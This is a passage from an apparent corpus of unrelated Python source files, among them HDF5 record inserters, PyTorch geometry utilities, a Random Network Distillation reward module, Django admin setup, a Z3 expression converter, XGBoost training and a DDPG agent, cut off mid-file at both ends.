data : Data to be inserted into an archive Returns ------- inserter : RecordInserter or None The RecordInserter *class* that can insert the data into an archive, or None if no such inserter can be found. """ for cls in self._inserters: if cls.can_insert(data): return cls return None def inserter(cls): """ Mark a class as an inserter. """ cls.__inserter__ = True return cls class RecordInserter(object): """ Stores a record for insertion. """ __metaclass__ = ABCMeta # The record type supported by the inserter record_type = None def __init__(self, label, data, deflate, registry=None): self.label = label self.deflate = int(deflate) self.data = self.original_data = data self.empty = 'no' self._registry = registry @property def registry(self): if self._registry is None: self._registry = InserterRegistry() return self._registry @staticmethod @abstractmethod def can_insert(data): """ Indicates if the Record can insert the passed data. This is to be overloaded by derived classes """ return False @abstractmethod def prepare_data(data): """ Prepare data for writing and record metadata. This is to be overloaded by derived classes. This is reponsible for recording metadata to be written by ``record_group_attributes`` and ``record_dataset_attributes``. """ return def record_group_attributes(self, dict_like): """ Record group attributes specific to the data. This includes all group-level data except 'Description'. """ set_encoded( dict_like, RecordType=self.record_type, Empty=self.empty, Deflate=self.deflate, ) @abstractmethod def insert(self, h5file, description): """ Insert the data into an h5py File. """ return @abstractmethod def insert_into_group(self, group): """ Insert data at the group level """ return class SimpleRecordInserter(RecordInserter): """ RecordInserter for simple objects. Subclasses must convert ``data`` to an ndarray. """ def insert(self, h5file, description): """ Insert the data into an h5py File. """ group = h5file.create_group(self.label) set_encoded( group.attrs, Description=description, ) self.insert_into_group(group) def insert_into_group(self, group): """ Insert at the group level """ self.prepare_data() self.record_group_attributes(group.attrs) self.insert_below_group(group) def insert_below_group(self, group): """ Insert below a group, creating the necessary dataset entry. """ maxshape = (None,) * self.data.ndim ds = group.create_dataset( self.label, maxshape=maxshape, data=self.data, compression=self.deflate, ) self.record_dataset_attributes(ds.attrs) def record_dataset_attributes(self, dict_like): """ Record the dataset attributes specific to the data. """ set_encoded( dict_like, RecordType=self.record_type, Empty=self.empty, ) class CompositeRecordInserter(RecordInserter): """ RecordInserter for composite objects. """ @abstractmethod def __iter__(self): """ Yield RecordInserter instances for subitems. """ return def record_dataset_attributes(self, dataset_attrs): """ CompositeRecordInserters do not record to datasets. """ return def insert(self, h5file, description): """ Insert the data into an h5py File. """ group = h5file.create_group(self.label) set_encoded( group.attrs, Description=description, ) self.insert_into_group(group) def insert_into_group(self, group): """ Insert at the group level """ self.prepare_data() self.record_group_attributes(group.attrs) for inserter in self: if isinstance(inserter, CompositeRecordInserter): # Sub-composites get their own new groups sub_group = group.create_group(inserter.label) inserter.insert_into_group(sub_group) else: # Simple data inserts below the composite group inserter.prepare_data() inserter.insert_below_group(group)
python
import torch import numpy as np from torch.nn import functional as F def create_uv(width, height): uv = np.flip(np.mgrid[height[0]:height[1], width[0]:width[1]].astype(np.int32), axis=0).copy() return uv.reshape((2, -1)).T def create_perpendicular_vectors_vectorized(normals): # Nx3 tensor def handle_zeros(n_vec): row_inds = torch.arange(n_vec.shape[0], device=normals.device, dtype=torch.long) max_inds = torch.abs(n_vec).argmax(dim=-1, keepdim=True) zero_inds = torch.arange(3, device=normals.device, dtype=torch.long).view(1, 3).repeat(n_vec.shape[0], 1) zero_inds = zero_inds[torch.where(zero_inds != max_inds)].view(n_vec.shape[0], -1) vec_x, vec_y = torch.zeros_like(n_vec), torch.zeros_like(n_vec) vec_x[row_inds, zero_inds[:, 0]] = 1 vec_y[row_inds, zero_inds[:, 1]] = 1 return vec_x, vec_y def handle_nonzeros(n_vec): row_inds = torch.arange(n_vec.shape[0], device=normals.device, dtype=torch.long) vec = torch.zeros_like(n_vec) max_ind = torch.abs(n_vec).argmax(dim=-1) vec[row_inds, max_ind] = n_vec[row_inds, max_ind] vec_x = torch.cross(vec, n_vec, dim=-1) vec_y = torch.cross(vec_x, n_vec, dim=-1) vec_y = F.normalize(vec_y, dim=-1) vec_x = F.normalize(vec_x, dim=-1) return vec_x, vec_y vec_x = torch.empty_like(normals) vec_y = torch.empty_like(normals) zero_inds = (normals == 0).sum(axis=-1) == 2 non_zero_inds = ~zero_inds if zero_inds.any(): vec_x[zero_inds], vec_y[zero_inds] = handle_zeros(normals[zero_inds]) if non_zero_inds.any(): vec_x[non_zero_inds], vec_y[non_zero_inds] = handle_nonzeros(normals[non_zero_inds]) return vec_x, vec_y def plane_points_to_3d_vectorized(normal_vec, local_coords, dhw): assert normal_vec.shape[0] == local_coords.shape[0] == dhw.shape[0] assert normal_vec.shape[1] == dhw.shape[1] == 3 and local_coords.shape[1] == 2 vec_d, vec_w = create_perpendicular_vectors_vectorized(normal_vec) T_inv = torch.cat((vec_d, normal_vec, vec_w), dim=-1).view(-1, 3, 3) # vectors are rows points2D = torch.cat(( local_coords, torch.zeros((local_coords.shape[0], 1), dtype=local_coords.dtype, device=local_coords.device)), dim=1) points2D = torch.stack((points2D[:, 1], points2D[:, 2], points2D[:, 0])).t() # xyz -> dhw space points3D = torch.matmul(points2D.unsqueeze(1), T_inv).squeeze() + dhw return points3D def trilinear_interpolation(points, grid): dhw_inds, interpolation_weights = add_trilinear_neigh_points(points) interpolated_values = \ grid[dhw_inds[..., 0].reshape(-1), dhw_inds[..., 1].reshape(-1), dhw_inds[..., 2].reshape(-1)] * interpolation_weights.view(-1, 1) interpolated_values = interpolated_values.view(-1, 8, grid.shape[-1]).sum(1) return interpolated_values def add_trilinear_neigh_points(xyz): """ Add neighbouring points. The first point is central Args: xyz (torch.Tensor): query points in the grid space (-1, 3) Returns: dhw inds (np.ndarray): grid points (-1, 8, 3) dhw weights (np.ndarray): grid points (-1, 8, 1) """ # new code points = xyz # get indices indices = torch.floor(points) # compute interpolation distance df = torch.abs(points - indices) # get interpolation indices xx, yy, zz = torch.meshgrid([torch.arange(0, 2), torch.arange(0, 2), torch.arange(0, 2)]) xx = xx.contiguous().view(8) yy = yy.contiguous().view(8) zz = zz.contiguous().view(8) shift = torch.stack([xx, yy, zz], dim=1) shift = shift.to(points.device) # reshape shift = shift.unsqueeze_(0) indices = indices.unsqueeze_(1) # compute indices indices = indices + shift # init weights weights = torch.zeros_like(indices).sum(dim=-1) # compute weights weights[:, 0] = (1 - df[:, 0]) * (1 - df[:, 1]) * (1 - df[:, 2]) weights[:, 1] = (1 - df[:, 0]) * (1 - df[:, 1]) * df[:, 2] weights[:, 2] = (1 - df[:, 0]) * df[:, 1] * (1 - df[:, 2]) weights[:, 3] = (1 - df[:, 0]) * df[:, 1] * df[:, 2] weights[:, 4] = df[:, 0] * (1 - df[:, 1]) * (1 - df[:, 2]) weights[:, 5] = df[:, 0] * (1 - df[:, 1]) * df[:, 2] weights[:, 6] = df[:, 0] * df[:, 1] * (1 - df[:, 2]) weights[:, 7] = df[:, 0] * df[:, 1] * df[:, 2] weights = weights.unsqueeze_(-1) return indices.view(-1, 8, 3).long(), weights.float().view(-1, 8, 1) def find_iso_surface(points, directions, sdf_grid, geometry_upsampling_factor=1, normal_marching=False): # S3 points are in [0, 1] space mask = torch.zeros(points.shape[0], dtype=torch.bool, device=points.device) if len(sdf_grid.shape) == 3: sdf_grid = sdf_grid.unsqueeze(-1) max_step = 4 # / max(sdf_grid.shape) original_points = points.clone() while True: sdfs = trilinear_interpolation(points * geometry_upsampling_factor, sdf_grid).view(-1) inds = (torch.abs(sdfs) > 1e-5) & (torch.abs(points - original_points) <= max_step).all(-1) mask = mask | ~inds if mask.all(): break points[inds] += sdfs[inds].view(-1, 1) * directions[inds] if not normal_marching: return points return points def get_patch_coordinates(patch_resolution, patch_size): puv = create_uv(width=(0, patch_resolution), height=(0, patch_resolution)) puv_coords = ((puv + 0.5) / patch_resolution - 0.5) * patch_size return torch.from_numpy(puv_coords).to(dtype=torch.float32) def shift_points(points, sdf_grid, normal_grid, geometry_upsampling_factor=1, prev_directions=None): directions = -trilinear_interpolation(points * geometry_upsampling_factor, normal_grid) directions = F.normalize(directions, dim=-1) if prev_directions is not None: inds_to_overwrite = torch.where((directions == 0).all(-1)) directions[inds_to_overwrite] = prev_directions[inds_to_overwrite] points = find_iso_surface(points, directions, sdf_grid, geometry_upsampling_factor) return points, directions def surfel_locations(dhw_inds, sdf_grid, normal_grid, voxel_size, patch_resolution, patch_size, geometry_upsampling_factor): # [0, 1] space n_shifts = num_divisible_by_2(patch_resolution) patch_resolution_list = [2 for _ in range(n_shifts)] if int(patch_resolution / 2 ** n_shifts) != 1: patch_resolution_list = patch_resolution_list + [int(patch_resolution / 2 ** n_shifts)] patch_size_list = [patch_size / (2 ** i) for i in range(len(patch_resolution_list))] d_inds, h_inds, w_inds = dhw_inds[0].long(), dhw_inds[1].long(), dhw_inds[2].long() points = voxel_size * torch.stack((d_inds, h_inds, w_inds)).t().float() # S3 voxel_centers = points.detach().clone() points, dirs = shift_points(points, sdf_grid, normal_grid, geometry_upsampling_factor) for i in range(len(patch_resolution_list)): # subdivide patch puv_coords = get_patch_coordinates(patch_resolution_list[i], patch_size_list[i]).repeat(points.shape[0], 1) points = points.repeat_interleave(patch_resolution_list[i] ** 2, dim=0).view(-1, 3) # (S4)3 dirs = dirs.repeat_interleave(patch_resolution_list[i] ** 2, dim=0).view(-1, 3) # (S4)3 points = plane_points_to_3d_vectorized(dirs, puv_coords, points) # (ST)3 points, dirs = shift_points(points, sdf_grid, normal_grid, geometry_upsampling_factor, dirs) # remove points that are outside their voxel cells voxel_centers = voxel_centers.repeat_interleave(patch_resolution ** 2, dim=0).view(-1, 3) shifted_points = torch.abs(voxel_centers - points).max(dim=-1)[0] outside_voxel_inds = shifted_points > voxel_size * 1 directions = -dirs directions[outside_voxel_inds] = 0 points[outside_voxel_inds] = float('inf') return points, directions def surfel_default_locations(dhw_inds, voxel_size, patch_resolution, patch_size): d_inds, h_inds, w_inds = dhw_inds[0].long(), dhw_inds[1].long(), dhw_inds[2].long() points = voxel_size * torch.stack((d_inds, h_inds, w_inds)).t().float() # S3 puv_coords = get_patch_coordinates(patch_resolution, patch_size).repeat(points.shape[0], 1) points = points.repeat_interleave(patch_resolution ** 2, dim=0).view(-1, 3) # (S4)3 dirs = torch.ones_like(points) # (S4)3 dirs = F.normalize(dirs, dim=-1) points = plane_points_to_3d_vectorized(dirs, puv_coords, points) # (ST)3 return points, dirs def num_divisible_by_2(number): i = 0 while not number % 2: number = number // 2 i += 1 return i def inv_extrinsics(extrinsics): assert type(extrinsics) == np.ndarray or torch.is_tensor(extrinsics) if torch.is_tensor(extrinsics): cam2world = torch.eye(4) cam2world[:3, :3] = extrinsics[:3, :3].t() cam2world[:3, 3] = torch.matmul(extrinsics[:3, :3].t(), -extrinsics[:3, 3]).reshape(-1) else: cam2world = np.eye(4) cam2world[:3, :3] = extrinsics[:3, :3].T cam2world[:3, 3] = np.matmul(extrinsics[:3, :3].T, -extrinsics[:3, 3]).reshape(-1) return cam2world def inv_cam2world(cam2world): assert type(cam2world) == np.ndarray or torch.is_tensor(cam2world) if torch.is_tensor(cam2world): extrinsics = torch.eye(4) extrinsics[:3, :3] = cam2world[:3, :3].t() extrinsics[:3, 3] = torch.matmul(extrinsics[:3, :3], -cam2world[:3, 3]).reshape(-1) else: # numpy extrinsics = np.eye(4) extrinsics[:3, :3] = cam2world[:3, :3].T extrinsics[:3, 3] = np.matmul(extrinsics[:3, :3], -cam2world[:3, 3]).reshape(-1) return extrinsics def sdf2normal_grid(sdf): normal_grid = np.zeros((*sdf.shape, 3), dtype=np.float32) d_diff = sdf[2:, :, :] - sdf[:-2, :, :] h_diff = sdf[:, 2:, :] - sdf[:, :-2, :] w_diff = sdf[:, :, 2:] - sdf[:, :, :-2] normal_grid[1:-1, :, :, 0] = d_diff normal_grid[:, 1:-1, :, 1] = h_diff normal_grid[:, :, 1:-1, 2] = w_diff norm = np.linalg.norm(normal_grid, axis=-1) inds = norm != 0 normal_grid[inds] = normal_grid[inds] / norm[inds, None] return normal_grid
python
import numpy as np import matplotlib.pyplot as plt import IPython from mm2d.model import ThreeInputModel # model parameters # link lengths L1 = 1 L2 = 1 # input bounds LB = -1 UB = 1 def pseudoinverse(J): JJT = J.dot(J.T) return J.T.dot(np.linalg.inv(JJT)) def weighted_ps(D, J): A = np.diag(D) return pseudoinverse(A @ J) @ A def main(): model = ThreeInputModel(L1, L2, LB, UB, output_idx=[0, 1]) v = np.array([0.5, 0.5]) q = np.array([0, 0.25*np.pi, -0.5*np.pi]) J = model.jacobian(q) Jps = pseudoinverse(J) IPython.embed() if __name__ == '__main__': main()
python
import unittest from bitmovin import Bitmovin from tests.utils import get_settings class BitmovinTests(unittest.TestCase): @classmethod def setUpClass(cls): super().setUpClass() @classmethod def tearDownClass(cls): super().tearDownClass() def setUp(self): super().setUp() self.settings = get_settings() if not self.settings or not isinstance(self.settings, dict): raise Exception('Unable to load settings') self.api_key = self.settings.get('apiKey') if not self.api_key or not isinstance(self.api_key, str): raise Exception('Unable to load apiKey from settings') def tearDown(self): super().tearDown() def test_init(self): bitmovin = Bitmovin(self.api_key) self.assertIsNotNone(bitmovin) self.assertTrue(isinstance(bitmovin, Bitmovin)) if __name__ == '__main__': unittest.main()
python
import numpy as np from typing import Dict from mlagents.torch_utils import torch from mlagents.trainers.buffer import AgentBuffer from mlagents.trainers.torch.components.reward_providers.base_reward_provider import ( BaseRewardProvider, ) from mlagents.trainers.settings import RNDSettings from mlagents_envs.base_env import BehaviorSpec from mlagents.trainers.torch.utils import ModelUtils from mlagents.trainers.torch.networks import NetworkBody from mlagents.trainers.settings import NetworkSettings, EncoderType from mlagents.trainers.trajectory import ObsUtil class RNDRewardProvider(BaseRewardProvider): """ Implementation of Random Network Distillation : https://arxiv.org/pdf/1810.12894.pdf """ def __init__(self, specs: BehaviorSpec, settings: RNDSettings) -> None: super().__init__(specs, settings) self._ignore_done = True self._random_network = RNDNetwork(specs, settings) self._training_network = RNDNetwork(specs, settings) self.optimizer = torch.optim.Adam( self._training_network.parameters(), lr=settings.learning_rate ) def evaluate(self, mini_batch: AgentBuffer) -> np.ndarray: with torch.no_grad(): target = self._random_network(mini_batch) prediction = self._training_network(mini_batch) rewards = torch.sum((prediction - target) ** 2, dim=1) return rewards.detach().cpu().numpy() def update(self, mini_batch: AgentBuffer) -> Dict[str, np.ndarray]: with torch.no_grad(): target = self._random_network(mini_batch) prediction = self._training_network(mini_batch) loss = torch.mean(torch.sum((prediction - target) ** 2, dim=1)) self.optimizer.zero_grad() loss.backward() self.optimizer.step() return {"Losses/RND Loss": loss.detach().cpu().numpy()} def get_modules(self): return { f"Module:{self.name}-pred": self._training_network, f"Module:{self.name}-target": self._random_network, } class RNDNetwork(torch.nn.Module): EPSILON = 1e-10 def __init__(self, specs: BehaviorSpec, settings: RNDSettings) -> None: super().__init__() state_encoder_settings = NetworkSettings( normalize=True, hidden_units=settings.encoding_size, num_layers=3, vis_encode_type=EncoderType.SIMPLE, memory=None, ) self._encoder = NetworkBody(specs.sensor_specs, state_encoder_settings) def forward(self, mini_batch: AgentBuffer) -> torch.Tensor: n_obs = len(self._encoder.processors) np_obs = ObsUtil.from_buffer(mini_batch, n_obs) # Convert to tensors tensor_obs = [ModelUtils.list_to_tensor(obs) for obs in np_obs] hidden, _ = self._encoder.forward(tensor_obs) self._encoder.update_normalization(mini_batch) return hidden
python
from django.contrib import admin from .models import Author, Category, Article, Comment # Register your models here. class AuthorModel(admin.ModelAdmin): list_display = ["__str__"] search_fields = ["__str__", "details"] class Meta: Model = Author admin.site.register(Author, AuthorModel) class ArticleModel(admin.ModelAdmin): list_display = ["__str__", "posted_on"] search_fields = ["__str__", "details"] list_per_page = 10 list_filter = ["posted_on", "category"] class Meta: Model = Article admin.site.register(Article, ArticleModel) class CategoryModel(admin.ModelAdmin): list_display = ["__str__"] search_fields = ["__str__"] list_per_page = 10 class Meta: Model = Category admin.site.register(Category, CategoryModel) class CommentModel(admin.ModelAdmin): list_display = ["__str__"] search_fields = ["__str__"] list_per_page = 10 class Meta: Model = Comment admin.site.register(Comment, CommentModel)
python
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import collections from typing import Union from ._sodium import ffi ByteLike = Union[ffi.CData, collections.abc.ByteString] def as_array(data: ByteLike) -> ffi.CData: """Convert a bytes-like object into an FFI-array. Args: data: An object that can convert to a list of integers. If an FFI array is passed, it will be returned as is. Returns: An FFI `CData` array with the given value. """ if isinstance(data, ffi.CData): return data array = ffi.new("unsigned char[]", list(data)) return array
python
"""tipo_hilo_cuerda Revision ID: 014 Revises: 013 Create Date: 2014-05-28 07:36:03.329028 """ # revision identifiers, used by Alembic. revision = '014' down_revision = '013' import inspect import imp import os from alembic import op def upgrade(): utils_path = os.path.join(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))), '..', 'utils.py') utils = imp.load_source('', utils_path) utils.create_categoric_table('tipo_hilo_cuerda', [ 'Fast Flight', 'BYC 55', 'DynaFlight', 'BYC 452X', 'B-50', 'D-75', ]) def downgrade(): op.drop_table('tipo_hilo_cuerda')
python
''' This file contains functions that help calculate the score and check word validity in the game. ''' #################################### # Global Variables #################################### WORDLENGTH = 4 #################################### # Cows and Bulls Counter #################################### def returnCowsAndBulls(guess, target): bullCount, cowCount = 0, 0 # Iterate through the guess for i in range(WORDLENGTH): if guess[i] == target[i]: bullCount += 1 elif guess[i] in target: cowCount += 1 return (bullCount == WORDLENGTH, cowCount, bullCount) #################################### # Formatted Score Tuple #################################### def getCowsAndBulls(data): if data.mode == "ai" and data.player == 0 and data.stage == 1: score = [ "_" if animal == None else animal for animal in data.pvcScore] else: if data.guesses == []: score = ("??", "??") else: score = (str(data.guesses[-1][1]), str(data.guesses[-1][2])) return score #################################### # Word Validity #################################### def wordContainsRepeats(word): letterCount = 0 for c in word: if c != None: letterCount += 1 wordSet = set(word) wordSet.discard(None) return letterCount != len(wordSet)
python
import sys sys.path.append("/Users/zhouxuerong/projects/autotest/autotest/autotest") from django.test import TestCase from apitest.views import Login from django.http import HttpRequest class titlePageTest(TestCase): def test_loginPage(self): request = HttpRequest() Response = Login(request) print(Response.content)
python
# -*- coding: utf-8 -*- def main(): s = input() if s == 'Sunny': print('Cloudy') elif s == 'Cloudy': print('Rainy') else: print('Sunny') if __name__ == '__main__': main()
python
from sqlalchemy import MetaData from sqlalchemy.ext.declarative import declarative_base metadata = MetaData() Base = declarative_base(metadata=metadata) from . import Assignment, Driver, DriverAssignment, Location, LocationPair, MergeAddress, RevenueRate, Trip
python
#!/usr/bin/python # -*- coding: utf-8 -*- # --------------------------------------------------------------------- # Copyright (c) 2012 Michael Hull. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # - Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # - Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in # the documentation and/or other materials provided with the # distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ---------------------------------------------------------------------- import numpy as np from morphforge.morphology.core import MorphologyArray from morphforge.morphology.importer.morphologyimporter import MorphologyImporter from StringIO import StringIO from morphforge.morphology.errors import MorphologyImportError from morphforge.morphology.core import MorphologyTree class NewSWCLoader(object): @classmethod def load_swc_single(cls, src, name=None): dtype = {'names': ('id', 'type', 'x', 'y', 'z', 'r', 'pid'), 'formats': ('int32', 'int32', 'f4', 'f4', 'f4', 'f4', 'int32') } swc_data_raw = np.loadtxt(src, dtype=dtype) if len(np.nonzero(swc_data_raw['pid'] == -1)) != 1: assert False, "Unexpected number of id'errstr of -1 in file" # We might not nessesarily have continuous indices in the # SWC file, so lets convert them: index_to_id = swc_data_raw['id'] id_to_index_dict = dict([(_id, index) for (index, _id) in enumerate(index_to_id)]) if len(id_to_index_dict) != len(index_to_id): errstr = "Internal Error Loading SWC: Index and ID map are different lengths." errstr += " [ID:%swc_data_raw, Index:%swc_data_raw]" % (len(index_to_id), len(id_to_index_dict)) raise MorphologyImportError(errstr) # Vertices are easy: vertices = swc_data_raw[['x', 'y', 'z', 'r']] vertices = np.vstack([swc_data_raw['x'], swc_data_raw['y'], swc_data_raw['z'], swc_data_raw['r']]).T # Connections need to translate id_to_index: connection_indices = [(id_to_index_dict[ID], id_to_index_dict[parent_id]) for ID, parent_id in swc_data_raw[['id', 'pid']] if parent_id != -1] # Types are specified per connection: section_types = [swctype for ID, swctype, parent_id in swc_data_raw[['id', 'type', 'pid']] if parent_id != -1] return MorphologyArray(vertices=vertices, connectivity=connection_indices, section_types=section_types, dummy_vertex_index=0, name=name) @classmethod def load_swc_set(cls, src): """Naive implementation, that doesn't take account of interleaving of nodes""" lines = [line.strip() for line in src.readlines()] lines = [line for line in lines if line and line[0] != '#'] # Break into sections where we get a new parent: splits = [[]] for line in lines: if int(line.split()[-1]) == -1: splits.append([]) splits[-1].append(line) splits = splits[1:] data_blocks = ['\n'.join(blk) for blk in splits] file_objs = [StringIO(blk) for blk in data_blocks] morphs = [cls.load_swc_single(src=fobj) for fobj in file_objs] return morphs # To Array: MorphologyImporter.register('fromSWC', NewSWCLoader.load_swc_single, as_type=MorphologyArray) # To Tree: def _load_swc_single_tree(*args, **kwargs): return NewSWCLoader.load_swc_single(*args, **kwargs).to_tree() MorphologyImporter.register('fromSWC', _load_swc_single_tree, as_type=MorphologyTree)
python
import utils from symbolic.symbolic_types.symbolic_int import SymbolicInteger from symbolic.symbolic_types.symbolic_type import SymbolicType from z3 import * class Z3Expression(object): def __init__(self): self.z3_vars = {} def toZ3(self,solver,asserts,query): self.z3_vars = {} solver.assert_exprs([self.predToZ3(p,solver) for p in asserts]) solver.assert_exprs(Not(self.predToZ3(query,solver))) def predToZ3(self,pred,solver,env=None): sym_expr = self._astToZ3Expr(pred.symtype,solver,env) if env == None: if not is_bool(sym_expr): sym_expr = sym_expr != self._constant(0,solver) if not pred.result: sym_expr = Not(sym_expr) else: if not pred.result: sym_expr = not sym_expr return sym_expr def getIntVars(self): return [ v[1] for v in self.z3_vars.items() if self._isIntVar(v[1]) ] # ----------- private --------------- def _isIntVar(self, v): raise NotImplementedException def _getIntegerVariable(self,name,solver): if name not in self.z3_vars: self.z3_vars[name] = self._variable(name,solver) return self.z3_vars[name] def _variable(self,name,solver): raise NotImplementedException def _constant(self,v,solver): raise NotImplementedException def _wrapIf(self,e,solver,env): if env == None: return If(e,self._constant(1,solver),self._constant(0,solver)) else: return e # add concrete evaluation to this, to check def _astToZ3Expr(self,expr,solver,env=None): if isinstance(expr, list): op = expr[0] args = [ self._astToZ3Expr(a,solver,env) for a in expr[1:] ] z3_l,z3_r = args[0],args[1] # arithmetical operations if op == "+": return self._add(z3_l, z3_r, solver) elif op == "-": return self._sub(z3_l, z3_r, solver) elif op == "*": return self._mul(z3_l, z3_r, solver) elif op == "//": return self._div(z3_l, z3_r, solver) elif op == "%": return self._mod(z3_l, z3_r, solver) # bitwise elif op == "<<": return self._lsh(z3_l, z3_r, solver) elif op == ">>": return self._rsh(z3_l, z3_r, solver) elif op == "^": return self._xor(z3_l, z3_r, solver) elif op == "|": return self._or(z3_l, z3_r, solver) elif op == "&": return self._and(z3_l, z3_r, solver) # equality gets coerced to integer elif op == "==": return self._wrapIf(z3_l == z3_r,solver,env) elif op == "!=": return self._wrapIf(z3_l != z3_r,solver,env) elif op == "<": return self._wrapIf(z3_l < z3_r,solver,env) elif op == ">": return self._wrapIf(z3_l > z3_r,solver,env) elif op == "<=": return self._wrapIf(z3_l <= z3_r,solver,env) elif op == ">=": return self._wrapIf(z3_l >= z3_r,solver,env) else: utils.crash("Unknown BinOp during conversion from ast to Z3 (expressions): %s" % op) elif isinstance(expr, SymbolicInteger): if expr.isVariable(): if env == None: return self._getIntegerVariable(expr.name,solver) else: return env[expr.name] else: return self._astToZ3Expr(expr.expr,solver,env) elif isinstance(expr, SymbolicType): utils.crash("{} is an unsupported SymbolicType of {}". format(expr, type(expr))) elif isinstance(expr, int): if env == None: return self._constant(expr,solver) else: return expr else: utils.crash("Unknown node during conversion from ast to Z3 (expressions): %s" % expr) def _add(self, l, r, solver): return l + r def _sub(self, l, r, solver): return l - r def _mul(self, l, r, solver): return l * r def _div(self, l, r, solver): return l / r def _mod(self, l, r, solver): return l % r def _lsh(self, l, r, solver): return l << r def _rsh(self, l, r, solver): return l >> r def _xor(self, l, r, solver): return l ^ r def _or(self, l, r, solver): return l | r def _and(self, l, r, solver): return l & r
python
import xgboost as xgb # read in data dtrain = xgb.DMatrix('../../data/data_20170722_01/train_data.txt') dtest = xgb.DMatrix('../../data/data_20170722_01/test_data.txt') # specify parameters via map, definition are same as c++ version param = {'max_depth':22, 'eta':0.1, 'silent':0, 'objective':'binary:logistic','min_child_weight':3,'gamma':14 } # specify validations set to watch performance watchlist = [(dtest,'eval'), (dtrain,'train')] num_round = 60 bst = xgb.train(param, dtrain, num_round, watchlist) # this is prediction preds = bst.predict(dtest) labels = dtest.get_label() positive_threshold_list = [0.50, 0.67, 0.80, 0.90, 0.95] for positive_threshold in positive_threshold_list: print('positive_threshold: ' + str(positive_threshold)) num_correct = sum(1 for i in range(len(preds)) if int(preds[i]>positive_threshold)==labels[i]) num_pred = len(preds) num_error = num_pred - num_correct print ('error=%d/%d=%f' % (num_error, num_pred, num_error /float(num_pred))) print ('accuracy=%d/%d=%f' % ( num_correct, num_pred, num_correct /float(num_pred))) num_true_positive = sum(1 for i in range(len(preds)) if int(preds[i]>positive_threshold)==labels[i] and labels[i]==1) num_positive_pred = sum(1 for i in range(len(preds)) if preds[i]>positive_threshold) print ('precision=%d/%d=%f' % ( num_true_positive, num_positive_pred, num_true_positive /float(num_positive_pred))) print('')
python
N = int(input()) N = str(N) if len(N)==1: print(1) elif len(N)==2: print(2) elif len(N)==3: print(3) elif len(N)>3: print("More than 3 digits")
python
from passlib.context import CryptContext PWD_CONTEXT = CryptContext(schemes=["bcrypt"], deprecated="auto") def verify_password(plain_password: str, hashed_password: str) -> bool: return PWD_CONTEXT.verify(plain_password, hashed_password) def get_password_hash(password: str) -> str: return PWD_CONTEXT.hash(password)
python
from .simple_ga import SimpleGA from .simple_es import SimpleES from .cma_es import CMA_ES from .de import DE from .pso import PSO from .open_es import OpenES from .pgpe import PGPE from .pbt import PBT from .persistent_es import PersistentES from .xnes import xNES from .ars import ARS from .sep_cma_es import Sep_CMA_ES from .bipop_cma_es import BIPOP_CMA_ES from .ipop_cma_es import IPOP_CMA_ES from .full_iamalgam import Full_iAMaLGaM from .indep_iamalgam import Indep_iAMaLGaM from .ma_es import MA_ES from .lm_ma_es import LM_MA_ES from .rm_es import RmES from .gld import GLD from .sim_anneal import SimAnneal __all__ = [ "SimpleGA", "SimpleES", "CMA_ES", "DE", "PSO", "OpenES", "PGPE", "PBT", "PersistentES", "xNES", "ARS", "Sep_CMA_ES", "BIPOP_CMA_ES", "IPOP_CMA_ES", "Full_iAMaLGaM", "Indep_iAMaLGaM", "MA_ES", "LM_MA_ES", "RmES", "GLD", "SimAnneal", ]
python
import random from model import Actor, Critic from ounoise import OUNoise import torch import torch.optim as optim GAMMA = 0.99 # discount factor TAU = 0.01 # for soft update of target parameters LR_ACTOR = 0.001 # learning rate of the actor LR_CRITIC = 0.001 # learning rate of the critic class Agent(): def __init__(self, state_size, action_size, num_agents, device, gamma=GAMMA, tau=TAU, lr_actor=LR_ACTOR, lr_critic=LR_CRITIC, random_seed=0): """ Initialize an Agent object. :param state_size: size of state :param action_size: size of action :param num_agents: number of agents :param gamma: discount factor :param tau: factor for soft update of target parameters :param lr_actor: Learning rate of actor :param lr_critic: Learning rate of critic :param random_seed: Random seed :param device: cuda or cpu """ self.device=device self.gamma = gamma self.tau=tau self.num_agents=num_agents self.state_size = state_size self.action_size = action_size self.full_state_size = state_size * num_agents self.full_action_size = action_size * num_agents self.seed = random.seed(random_seed) # Actor Network (w/ Target Network) self.actor_local = Actor(state_size, action_size, device, random_seed).to(device) self.actor_target = Actor(state_size, action_size, device, random_seed).to(device) self.actor_optimizer = optim.Adam(self.actor_local.parameters(), lr=lr_actor) # Critic Network (w/ Target Network) self.critic_local = Critic(self.full_state_size, self.full_action_size, device=device, random_seed=random_seed).to(device) self.critic_target = Critic(self.full_state_size, self.full_action_size, device=device, random_seed=random_seed).to(device) self.critic_optimizer = optim.Adam(self.critic_local.parameters(), lr=lr_critic, weight_decay=0) self.noise = OUNoise(action_size, random_seed) def save_model(self, agent_number): torch.save(self.actor_local.state_dict(), f'models/checkpoint_actor_{agent_number}.pth') torch.save(self.critic_local.state_dict(), f'models/checkpoint_critic_{agent_number}.pth') def load_model(self, agent_number): checkpoint = 